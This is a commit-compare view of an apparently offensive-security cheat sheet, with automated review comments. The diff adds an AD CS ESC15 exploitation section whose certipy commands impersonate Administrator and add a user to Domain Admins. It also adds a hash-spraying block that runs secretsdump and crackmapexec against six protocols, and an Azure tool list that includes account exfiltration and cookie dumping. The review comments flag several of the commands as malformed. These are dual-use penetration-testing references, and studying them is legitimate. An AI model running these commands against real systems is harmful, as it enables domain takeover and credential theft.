Compare commits


3 Commits

Author SHA1 Message Date
NoPurposeInLife 94921ca71e Merge 2143a1a52e into 629e3f7c1e 2024-10-23 09:27:37 +01:00
Swissky 629e3f7c1e ESC15 + Azure Enumeration Tools 2024-10-21 22:41:13 +02:00
NoPurposeInLife 2143a1a52e Update pwd-spraying.md 2024-07-25 21:49:15 +08:00
3 changed files with 83 additions and 6 deletions

View File

@ -423,6 +423,50 @@ Members : {}
```
## ESC15 - EKUwu Application Policies
**Requirements**
* **Template Schema Version 1**
* **ENROLLEE_SUPPLIES_SUBJECT** = True
**Exploitation**:
Detect the vulnerability from BloodHound data using the following cypher query.
```ps1
MATCH p=(:Base)-[:MemberOf*0..]->()-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain) WHERE ct.enrolleesuppliessubject = True AND ct.authenticationenabled = False AND ct.requiresmanagerapproval = False AND ct.schemaversion = 1 RETURN p
```
The **Application Policies** extension is a proprietary certificate extension with the OID `1.3.6.1.4.1.311`, same as **x509 EKUs**. It was designed to allow users to specify additional use cases for certificates by utilizing the same OIDs as those in the Enhanced Key Usage extension.
If there is a conflict between an Application Policy and an EKU, then Microsoft prefers the proprietary Application Policy.
> "Application policy is Microsoft specific and is treated much like Extended Key Usage. If a certificate has an extension containing an application policy and also has an EKU extension, the EKU extension is ignored." - Microsoft
When a user requests a certificate based on a schema version 1 template and includes an application policy, the policy is incorporated into the certificate. This allows users to specify arbitrary EKUs, bypassing the requirements for ESC2.
**ESC1** - The WebServer template is enabled by default in ADCS, requires a user-supplied SAN and only has the `Server Authentication` EKU. Using [ly4k/Certipy PR #228](https://github.com/ly4k/Certipy/pull/228), we can add the `Client Authentication` EKU to `WebServer`. Anybody with the `Enroll` permission on this template can now compromise the domain.
```ps1
certipy req -dc-ip 10.10.10.10 -ca CA -target-ip 10.10.10.11 -u user@domain.com -p 'P@ssw0rd' -template WebServer -upn Administrator@domain.com --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 -ldap-shell
# in LDAP shell
add_user pentest_user
add_user_to_group pentest_user "Domain Admins"
```
**ESC2/ESC3** - **Certificate Request Agent** (`1.3.6.1.4.1.311.20.2.1`),
```ps1
certipy -req -u user@domain.com -p 'P@ssw0rd' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca "Lab Root CA" -template WebServer -dc-ip 10.10.10.10 -target-ip 10.10.10.11
certipy -req -u user@domain.com -p 'P@ssw0rd' -on-behalf-of DOMAIN\\Administrator -Template User -ca "Lab Root CA" -pfx user.pfx -dc-ip 10.10.10.10 -target-ip 10.10.10.11
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```
## Certifried CVE-2022-26923
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
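Review bot: `certipy -req` on the two ESC2/ESC3 lines is not a valid invocation; the subcommand takes no leading dash (compare `certipy req` in the ESC1 block of the same hunk), and `-Template User` should be `-template User` to match the flag spelling on every other line. Two smaller points in the same hunk: the Application Policies paragraph gives the OID as `1.3.6.1.4.1.311`, which is only the Microsoft enterprise arc, and calls it "the same as x509 EKUs", which contradicts the next sentence saying it is a separate extension that reuses the EKU purpose OIDs; suggest "a Microsoft proprietary extension that, like EKU, carries a list of purpose OIDs" and either the full extension OID or none. The BloodHound query is Cypher, so its fence should be tagged cypher rather than ps1, `## ESC15` needs a blank line after the preceding closing fence so the heading renders, and the "**ESC2/ESC3** - **Certificate Request Agent** (...)," line ends in a comma and should be finished as a sentence.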
@ -542,4 +586,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
* [ADCS ESC14 Abuse Technique - Jonas Bülow Knudsen - 02/01/2024](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9)
* [ADCS Attack Paths in BloodHound — Part 2 - Jonas Bülow Knudsen - May 1, 2024](https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547)
* [ESC12 Shell access to ADCS CA with YubiHSM - hajo - October 2023](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
* [AD CS Domain Escalation - HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#shell-access-to-adcs-ca-with-yubihsm-esc12)
* [AD CS Domain Escalation - HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#shell-access-to-adcs-ca-with-yubihsm-esc12)
* [ESC15/EKUwu PR #228 - dru1d-foofus - 10/08/2024](https://github.com/ly4k/Certipy/pull/228)
* [EKUwu: Not just another AD CS ESC - Justin Bollinger - October 08, 2024](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
* [ADCS Exploitation Part 2: Certificate Mapping + ESC15 - Giulio Pierantoni - Oct 10, 2024](https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760)
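Review bot: the HackTricks entry appears once as a removed and once as an added line with identical text, so the only real change there is the missing newline at end of file; harmless, but worth a word in the commit message. The three new references use three different date formats (10/08/2024, October 08, 2024, Oct 10, 2024) beside existing entries in DD/MM/YYYY and "May 1, 2024" style; pick one format for the list, and spell the month out for the PR #228 entry since 10/08/2024 is ambiguous (it is 8 October per the TrustedSec post next to it).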

View File

@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
## Spray passwords against everything
* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
```
> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
echo "" >> users.txt
echo "Administrator" >> users.txt
echo "Guest" >> users.txt
echo "DefaultAccount" >> users.txt
echo "WDAGUtilityAccount" >> users.txt
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
```
## BadPwdCount attribute
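Review bot: `./cme ssh ... -H hashes.txt` cannot work, since SSH has no NT-hash authentication; the two ssh lines (domain and `--local-auth`) should take `-p` with a password list or be dropped, and `--local-auth` is likewise meaningless on the ldap line. The block also appends an empty line to users.txt with `echo "" >> users.txt`, which makes every protocol attempt a blank username; if that is intentional, say so in a comment, otherwise remove it. Style: the new block uses an untagged fence while the rest of the file tags fences as ps1, the first line inside the fence starts with `>` (which reads as a shell redirect, not a comment; use `#`), and the literal NT hash on the secretsdump line should be a placeholder such as `<nt-hash>` like the other examples in this file. The twelve near-identical cme lines would be clearer as one loop over the protocol list.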
@ -77,4 +101,4 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
```
```
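Review bot: the removed and added closing fences are identical, so this hunk only adds the missing newline at end of file; fine, but the commit message "Update pwd-spraying.md" gives no hint of that, and a whitespace-only hunk deserves a mention so reviewers do not hunt for a content change.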

View File

@ -3,7 +3,7 @@
## Azure AD - Collectors
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
* [**dirkjanm/ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
```ps1
roadrecon auth --access-token eyJ0eXA...
roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
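Review bot: renaming the entry to `dirkjanm/ROADTool` matches the owner/repo style of the other entries, but the repository is spelled `ROADtools` (see the URL on the same line); use `dirkjanm/ROADtools` so the displayed name matches the link.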
@ -52,6 +52,12 @@
Get-Help Invoke-Monkey365 -Examples
Get-Help Invoke-Monkey365 -Detailed
```
* [**prowler-cloud/prowler**](https://github.com/prowler-cloud/prowler) - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
* [**projectdiscovery/nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates/tree/main/cloud/azure) - Community curated list of templates for the nuclei engine to find security vulnerabilities.
```ps1
nuclei -t ~/nuclei-templates/cloud/azure/ -code -v
```
* [**nccgroup/ScoutSuite**](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
```ps1
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
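Review bot: the prowler entry is the project's marketing blurb (a dozen compliance frameworks listed by name) and is several times longer than any other entry in this list; trim it to one line such as "multi-cloud security assessment and compliance tool (AWS, Azure, GCP, Kubernetes)". On the nuclei line, `-code` enables code-protocol templates, which execute commands on the local machine, so the one-liner assumes an already authenticated Azure CLI session; a short comment stating that prerequisite would stop readers running it blind. ScoutSuite is the only new tool without a usage example while its neighbours each have one; add one or accept the inconsistency deliberately.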
@ -66,10 +72,9 @@
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
* [**FSecureLABS/Azurite**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
## Azure AD - User Enumeration
### Enumerate Tenant Informations
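Review bot: the rename to `FSecureLABS/Azurite` matches the repository name and the owner/repo convention; fine. Drive-by in the context lines: "Enumerate Tenant Informations" should read "Enumerate Tenant Information" (information is uncountable).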
@ -222,4 +227,5 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Reco
* [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/)
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
* [Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024](https://blog.projectdiscovery.io/azure-config-review-with-nuclei/)
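Review bot: the Altered Security line is removed and re-added unchanged, so this is the same trailing-newline fix seen in the other files, and only the Nuclei blog reference is new. Its date "Sep 12, 2024" introduces yet another format beside "September 06, 2020" and "Jan 28, 2020"; align the new entry with whichever format the list settles on.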